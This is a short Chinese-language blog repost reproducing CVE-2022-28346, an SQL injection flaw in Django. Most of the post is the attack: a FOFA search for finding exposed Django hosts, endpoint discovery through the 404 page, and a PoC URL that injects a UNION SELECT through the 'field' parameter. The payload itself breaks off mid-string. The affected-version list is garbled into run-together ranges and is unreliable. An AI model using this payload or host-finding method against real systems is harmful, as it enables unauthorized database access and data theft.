本文转载于公众号:融云攻防实验室,原文地址:
漏洞复现 CVE-2022-28346 Django SQL注入漏洞
0x01 阅读须知
资源来源于网络,安全小天地只是再次进行分享,使用请遵循本站的免责申明
0x02 漏洞描述
Django是用Python开发的一个免费开源的Web框架,几乎囊括了Web应用的方方面面,可以用于快速搭建高性能、优雅的网站,Django提供了许多网站后台开发经常用到的模块,使开发者能够专注于业务部
0x03 漏洞复现
漏洞影响:
- 4.0 <= Django < 4.0.43.2 <= Django < 3.2.132.2 <= Django < 2.2.28
FOFA:Django
1.通过404页面可以发现存在哪些接口
http://x.x.x.x:8080/404![图片[1]-CVE-2022-28346 Django SQL注入漏洞-安全小天地](https://img.godyu.com/2023/12/20231226124640810.png?imageView2/0/format/webp/q/75)
2.使用poc,执行注入
http://x.x.x.x:8080/demo/?field=demo.name%22%20FROM%20%22demo_user%22%20union%20SELECT%20%221%22,sqlit![图片[2]-CVE-2022-28346 Django SQL注入漏洞-安全小天地](https://img.godyu.com/2023/12/20231226204641139.png?imageView2/0/format/webp/q/75)
THE END
暂无评论内容